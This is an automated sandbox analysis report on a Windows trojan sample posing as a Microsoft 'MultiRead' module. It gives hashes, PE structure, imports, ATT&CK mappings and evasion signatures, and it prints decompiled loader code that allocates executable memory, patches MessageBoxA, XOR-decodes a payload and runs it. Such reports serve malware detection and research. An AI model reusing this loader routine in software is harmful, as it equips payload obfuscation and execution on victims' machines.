Edit tour

Windows Analysis Report
Confirming#000092002.exe

Overview

General Information

Sample Name:	Confirming#000092002.exe
Analysis ID:	596169
MD5:	24a097b3cd1e774e29e6e3e4f5e6522a
SHA1:	f856350b37fae02331ce184b1f258f80900d8de5
SHA256:	23cae5cce339ef9de5d22c2117af79d45013d65241fbe6faa7a36e94e191b42b
Tags:	exelimeratwarzonerat
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Uses 32bit PE files

Antivirus or Machine Learning detection for unpacked file

Sample file is different than original file name gathered from version info

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to read the PEB

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Found large amount of non-executed APIs

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Program does not show much activity (idle)

Classification

Process Tree

System is w10x64

Confirming#000092002.exe (PID: 6540 cmdline: "C:\Users\user\Desktop\Confirming#000092002.exe" MD5: 24A097B3CD1E774E29E6E3E4F5E6522A)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Confirming#000092002.exe

ReversingLabs: Detection: 54%

Source: 1.2.Confirming#000092002.exe.ea0000.0.unpack	Avira: Label: ADWARE/Adware.Gen8
Source: 1.0.Confirming#000092002.exe.ea0000.0.unpack	Avira: Label: ADWARE/Adware.Gen8

Source: Confirming#000092002.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Confirming#000092002.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: Confirming#000092002.exe

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EAA22B FindFirstFileExW,

1_2_00EAA22B

Source: Confirming#000092002.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: Confirming#000092002.exe, 00000001.00000000.244166012.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMultiRead.EXEB vs Confirming#000092002.exe
Source: Confirming#000092002.exe	Binary or memory string: OriginalFilenameMultiRead.EXEB vs Confirming#000092002.exe

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EAFA9C

1_2_00EAFA9C

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: String function: 00EA4730 appears 34 times

Source: Confirming#000092002.exe

ReversingLabs: Detection: 54%

Source: Confirming#000092002.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EA1B39 __EH_prolog3_catch_GS,__alloca_probe_16,LoadLibraryExA,LoadLibraryExA,FindResourceA,LoadResource,SizeofResource,FreeLibrary,

1_2_00EA1B39

Source: classification engine

Classification label: mal48.winEXE@1/0@0/0

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EA14A2 CoCreateInstance,

1_2_00EA14A2

Source: Confirming#000092002.exe

Static file information: File size 1320960 > 1048576

Source: Confirming#000092002.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x129400

Source: Confirming#000092002.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Confirming#000092002.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Confirming#000092002.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Confirming#000092002.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Confirming#000092002.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Confirming#000092002.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Confirming#000092002.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: Confirming#000092002.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: Confirming#000092002.exe

Source: Confirming#000092002.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Confirming#000092002.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Confirming#000092002.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Confirming#000092002.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Confirming#000092002.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EB01B1 push ecx; ret

1_2_00EB01C4

Source: C:\Users\user\Desktop\Confirming#000092002.exe

API coverage: 3.3 %

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EA71A3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,

1_2_00EA71A3

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EAA22B FindFirstFileExW,

1_2_00EAA22B

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EA4959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_00EA4959

Source: C:\Users\user\Desktop\Confirming#000092002.exe	Code function: 1_2_00EA7B8E mov eax, dword ptr fs:[00000030h]		1_2_00EA7B8E
Source: C:\Users\user\Desktop\Confirming#000092002.exe	Code function: 1_2_00EA9DF6 mov eax, dword ptr fs:[00000030h]		1_2_00EA9DF6

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EA71A3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C

1_2_00EA71A3

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EAB2B8 GetProcessHeap,

1_2_00EAB2B8

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\Confirming#000092002.exe	Code function: 1_2_00EA4AEF SetUnhandledExceptionFilter,	1_2_00EA4AEF
Source: C:\Users\user\Desktop\Confirming#000092002.exe	Code function: 1_2_00EA4959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00EA4959
Source: C:\Users\user\Desktop\Confirming#000092002.exe	Code function: 1_2_00EA72E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00EA72E0
Source: C:\Users\user\Desktop\Confirming#000092002.exe	Code function: 1_2_00EA42DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00EA42DA

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EA4775 cpuid

1_2_00EA4775

Source: C:\Users\user\Desktop\Confirming#000092002.exe

Code function: 1_2_00EA4BDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_00EA4BDE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Software Packing	LSASS Memory	2 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Obfuscated Files or Information	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Confirming#000092002.exe	55%	ReversingLabs	Win32.Trojan.Tnega

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
1.2.Confirming#000092002.exe.ea0000.0.unpack	100%	Avira	ADWARE/Adware.Gen8		Download File
1.0.Confirming#000092002.exe.ea0000.0.unpack	100%	Avira	ADWARE/Adware.Gen8		Download File

Domains and IPs

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	596169
Start date and time:	2022-03-24 11:33:12 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Confirming#000092002.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.winEXE@1/0@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 91.9%) Quality average: 77.4% Quality standard deviation: 31.2%
HCA Information:	Successful, ratio: 100% Number of executed functions: 6 Number of non-executed functions: 54
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateThreadEx calls found.
Report size getting too big, too many NtResumeThread calls found.
Report size getting too big, too many NtTerminateThread calls found.

Joe Sandbox View / Context

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	2.7481336301363
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Confirming#000092002.exe
File size:	1320960
MD5:	24a097b3cd1e774e29e6e3e4f5e6522a
SHA1:	f856350b37fae02331ce184b1f258f80900d8de5
SHA256:	23cae5cce339ef9de5d22c2117af79d45013d65241fbe6faa7a36e94e191b42b
SHA512:	bece11031bd79539c0669a62f3945d43ce0d78d768d242762c81213f471af17dc7a33c04527f1276edb27510334f8aae7b19b2cc2c204af2d560f0612e2f8651
SSDEEP:	6144:aNk8vti3OqUP1bL00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+e:Ak8l4D4pa7+ocZ
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V\-..=C..=C..=C..V@..=C..VF..=C.pEG..=C.pE@..=C.pEF.#=C..VE..=C..VG..=C..VB..=C..=B..=C..DJ..=C..D...=C..=...=C..DA..=C.Rich.=C

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General

Entrypoint:	0x404718
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6237B381 [Sun Mar 20 23:06:41 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	5ed77736e49da7d22b203d8d8f918a6b

Entrypoint Preview

Instruction
call 00007F006871E223h
jmp 00007F006871DB8Fh
retn 0000h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push 00405570h
push dword ptr fs:[00000000h]
mov eax, dword ptr [esp+10h]
mov dword ptr [esp+10h], ebp
lea ebp, dword ptr [esp+10h]
sub esp, eax
push ebx
push esi
push edi
mov eax, dword ptr [00419008h]
xor dword ptr [ebp-04h], eax
xor eax, ebp
push eax
mov dword ptr [ebp-18h], esp
push dword ptr [ebp-08h]
mov eax, dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFEh
mov dword ptr [ebp-08h], eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
ret
push ebp
mov ebp, esp
and dword ptr [00542724h], 00000000h
sub esp, 24h
or dword ptr [00419010h], 01h
push 0000000Ah
call dword ptr [0041122Ch]
test eax, eax
je 00007F006871DEC2h
and dword ptr [ebp-10h], 00000000h
xor eax, eax
push ebx
push esi
push edi
xor ecx, ecx
lea edi, dword ptr [ebp-24h]
push ebx
cpuid
mov esi, ebx
pop ebx
nop
mov dword ptr [edi], eax
mov dword ptr [edi+04h], esi
mov dword ptr [edi+08h], ecx
xor ecx, ecx
mov dword ptr [edi+0Ch], edx
mov eax, dword ptr [ebp-24h]
mov edi, dword ptr [ebp-20h]
mov dword ptr [ebp-0Ch], eax
xor edi, 756E6547h
mov eax, dword ptr [ebp-18h]
xor eax, 49656E69h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr [ebp-1Ch]
xor eax, 6C65746Eh
mov dword ptr [ebp-08h], eax

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x174a0	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x143000	0xd28	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x144000	0x12dc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16380	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x162c0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xf9cd	0xfa00	False	0.605875	data	6.61019563742	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x7322	0x7400	False	0.416386045259	data	4.90923942869	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x129e78	0x129400	False	0.133981253942	data	2.29316435389	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x143000	0xd28	0xe00	False	0.339006696429	data	3.85073462575	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x144000	0x12dc	0x1400	False	0.7365234375	data	6.39751442919	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
REGISTRY	0x1434d0	0xaa	ASCII text	English	United States
TYPELIB	0x1436a0	0x4d0	data	English	United States
RT_DIALOG	0x143580	0x11a	data	English	United States
RT_STRING	0x143b70	0x32	data	English	United States
RT_VERSION	0x1431f0	0x2dc	data	English	United States
RT_MANIFEST	0x143ba8	0x17d	XML 1.0 document text	English	United States

Imports

DLL	Import
KERNEL32.dll	DecodePointer, DeleteCriticalSection, GetTickCount, AcquireSRWLockExclusive, AssignProcessToJobObject, CompareStringW, ConnectNamedPipe, CreateDirectoryW, CreateEventW, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateJobObjectW, CreateMutexW, CreateNamedPipeW, CreateProcessW, CreateRemoteThread, CreateSemaphoreW, DebugBreak, DeleteFileW, DisconnectNamedPipe, DuplicateHandle, EncodePointer, EnterCriticalSection, EnumSystemLocalesEx, EnumSystemLocalesW, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetDateFormatW, GetDriveTypeW, GetEnvironmentStringsW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileSizeEx, GetFileType, GetFullPathNameW, GetLocalTime, GetLocaleInfoW, GetLongPathNameW, CreateThread, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOEMCP, GetProcAddress, GetProcessHandleCount, GetProcessHeaps, GetProcessId, GetProcessTimes, GetQueuedCompletionStatus, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDefaultLCID, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadId, GetThreadLocale, GetThreadPriority, GetTimeFormatW, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultLangID, GetUserDefaultLocaleName, GetModuleFileNameA, SizeofResource, VirtualProtect, SetLastError, VirtualAlloc, LoadLibraryExA, LeaveCriticalSection, FindResourceA, Sleep, IsDBCSLeadByte, LoadResource, WideCharToMultiByte, lstrcmpiA, GetConsoleOutputCP, SetFilePointerEx, SetStdHandle, IsValidCodePage, HeapReAlloc, HeapSize, LCMapStringW, WriteFile, VirtualQuery, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, RaiseException, CloseHandle, GetLastError, MultiByteToWideChar, GetCurrentThreadId, InitializeCriticalSectionEx, GetModuleFileNameW, RtlUnwind, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, GetProcessHeap, HeapFree, IsDebuggerPresent, OutputDebugStringW, HeapAlloc, WriteConsoleW
USER32.dll	CharNextA, MessageBoxA
ADVAPI32.dll	RegQueryInfoKeyW, RegDeleteKeyA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegDeleteValueA, RegEnumKeyExA, RegCloseKey
ole32.dll	CoCreateInstance, CoTaskMemFree, CoTaskMemRealloc, CoTaskMemAlloc
OLEAUT32.dll	VarUI4FromStr

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	MultiRead
FileVersion	1, 0, 0, 1
ProductName	MultiRead Module
ProductVersion	1, 0, 0, 1
FileDescription	MultiRead Module
OriginalFilename	MultiRead.EXE
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Statistics

Disassembly

Reset < >

Analysis Process: Confirming#000092002.exePID: 6540, Parent PID: 2372COMMON

Execution Graph

Execution Coverage:	1.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.2%
Total number of Nodes:	979
Total number of Limit Nodes:	25

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00EA4AEF() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00EA4AFB); // executed
				return _t1;
			}

0x00ea4af4
0x00ea4afa

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00004AFB,00EA458F), ref: 00EA4AF4

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 265b84959c614e627e04da1aaab345022978ad1c977b8763b5bd62d6198eb7f1
Instruction ID: 82d9a2561b9c19abf66f05da43f51f6585186b8d09a5eabfe4c7a1c35e33dbfd
Opcode Fuzzy Hash: 265b84959c614e627e04da1aaab345022978ad1c977b8763b5bd62d6198eb7f1
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00EA3A86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108
memorywindowsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E00EA3A86() {
				signed int _v8;
				intOrPtr _v12;
				char _v109;
				char _v110;
				char _v111;
				char _v112;
				struct _SECURITY_ATTRIBUTES* _v116;
				void* _v120;
				long _v124;
				signed int _t36;
				void* _t38;
				signed int _t60;
				void* _t61;
				CHAR* _t62;
				signed int _t64;
				void* _t65;
				signed int* _t69;
				signed int _t70;
				_Unknown_base(*)()* _t72;
				signed int _t73;

				_t36 =  *0xeb9008; // 0x64e1d101
				_v8 = _t36 ^ _t73;
				asm("movaps xmm0, [0xeb62b0]");
				asm("movups [ebp-0x68], xmm0");
				asm("movaps xmm0, [0xeb6270]");
				asm("movups [ebp-0x58], xmm0");
				asm("movaps xmm0, [0xeb6280]");
				asm("movups [ebp-0x48], xmm0");
				asm("movaps xmm0, [0xeb62a0]");
				asm("movups [ebp-0x38], xmm0");
				asm("movaps xmm0, [0xeb6290]");
				asm("movups [ebp-0x28], xmm0");
				asm("movaps xmm0, [0xeb6260]");
				asm("movups [ebp-0x18], xmm0");
				_v12 = 0x9d580485;
				_t38 = VirtualAlloc(0, 0xa00000, 0x3000, 0x40); // executed
				_t72 = MessageBoxA;
				_v124 = _v124 & 0x00000000;
				_v120 = _t38;
				VirtualProtect(MessageBoxA, 0x100, 0x40,  &_v124); // executed
				_t69 = 0xfb387c;
				_v109 =  *MessageBoxA;
				_v110 =  *((intOrPtr*)(1));
				_v111 =  *((intOrPtr*)(2));
				_v112 =  *((intOrPtr*)(3));
				 *MessageBoxA = 0x900010c2;
				_v116 = 0;
				do {
					_t60 =  !( *_t69); // executed
					CreateThread(0, 0, _t72, 0, 0, 0); // executed
					if(_t60 != 0) {
						 *(_v116 + _v120) = _t60;
					}
					_v116 = _v116 + 1;
					_t69 = _t69 - 4;
					_push(0);
					_pop(0);
				} while (_t69 >= 0xeb9880);
				_t61 = 0xea920;
				do {
					_t70 = 0x400;
					do {
						MessageBoxA(0, "rick", "rick", 2);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					_t61 = _t61 - 1;
				} while (_t61 != 0);
				_t62 = "rick";
				do {
					MessageBoxA(0, _t62, _t62, 1);
					_t64 = 0x64;
					_t65 = _v120;
					 *(_t65 + _t70) =  *(_t65 + _t70) ^  *(_t73 + _t70 % _t64 - 0x68);
					_t70 = _t70 + 1;
				} while (_t70 < 0x3e800);
				 *_t72 = _v109;
				 *((char*)(_t72 + 1)) = _v110;
				 *((char*)(_t72 + 2)) = _v111;
				 *((char*)(_t72 + 3)) = _v112;
				 *_t65();
				L11:
				Sleep(0x1388);
				goto L11;
			}

0x00ea3a8c
0x00ea3a93
0x00ea3a96
0x00ea3a9d
0x00ea3aa2
0x00ea3aaa
0x00ea3aaf
0x00ea3ab6
0x00ea3abc
0x00ea3ac3
0x00ea3acc
0x00ea3ad3
0x00ea3adc
0x00ea3ae5
0x00ea3ae9
0x00ea3af0
0x00ea3af6
0x00ea3afc
0x00ea3b00
0x00ea3b0f
0x00ea3b17
0x00ea3b1c
0x00ea3b22
0x00ea3b28
0x00ea3b2e
0x00ea3b33
0x00ea3b39
0x00ea3b3c
0x00ea3b44
0x00ea3b46
0x00ea3b4e
0x00ea3b56
0x00ea3b56
0x00ea3b59
0x00ea3b5c
0x00ea3b5f
0x00ea3b61
0x00ea3b62
0x00ea3b6a
0x00ea3b6f
0x00ea3b6f
0x00ea3b74
0x00ea3b82
0x00ea3b84
0x00ea3b84
0x00ea3b89
0x00ea3b89
0x00ea3b8e
0x00ea3b93
0x00ea3b99
0x00ea3ba1
0x00ea3ba4
0x00ea3bab
0x00ea3bae
0x00ea3baf
0x00ea3bba
0x00ea3bbf
0x00ea3bc5
0x00ea3bcb
0x00ea3bce
0x00ea3bd0
0x00ea3bd5
0x00000000

APIs

VirtualAlloc.KERNELBASE(00000000,00A00000,00003000,00000040), ref: 00EA3AF0
VirtualProtect.KERNELBASE(75C17E90,00000100,00000040,00000000), ref: 00EA3B0F
CreateThread.KERNELBASE(00000000,00000000,75C17E90,00000000,00000000,00000000), ref: 00EA3B46
MessageBoxA.USER32 ref: 00EA3B82
MessageBoxA.USER32 ref: 00EA3B99
Sleep.KERNEL32(00001388), ref: 00EA3BD5

Strings

rick, xrefs: 00EA3B76, 00EA3B7B, 00EA3B8E, 00EA3B95, 00EA3B96

Memory Dump Source

Source File: 00000001.00000002.778471988.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000001.00000002.778444294.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778735204.0000000000EB1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778766212.0000000000EB9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.778775493.0000000000EBA000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.779868874.0000000000FE2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.780096940.0000000000FE3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ea0000_Confirming#000092002.jbxd

Similarity

API ID: MessageVirtual$AllocCreateProtectSleepThread
String ID: rick
API String ID: 1205271519-868534032
Opcode ID: 0d601432bc0741b8b4a15b4d5a7f35d6901489796e1f049ddb6cd7b2092e54c8
Instruction ID: cf0f0c9aaacd3e743bdd68fe1495be55effaa372a9742c217e5eab4dfba2e890
Opcode Fuzzy Hash: 0d601432bc0741b8b4a15b4d5a7f35d6901489796e1f049ddb6cd7b2092e54c8
Instruction Fuzzy Hash: CF41DA25E043C89EE7118FB98C417FEBFB5AF1A300F146259FAC87B263D6606985C760

Uniqueness

Uniqueness Score: -1.00%

Function 00EA7FEA Relevance: 3.0, APIs: 2, Instructions: 31
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00EA7FEA(void* __eax, void* __ebx, void* __ecx, void* __edx) {

				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
			}

0x00ea7fef

APIs

Part of subcall function 00EAB234: GetEnvironmentStringsW.KERNEL32 ref: 00EAB23D
Part of subcall function 00EAB234: _free.LIBCMT ref: 00EAB29C
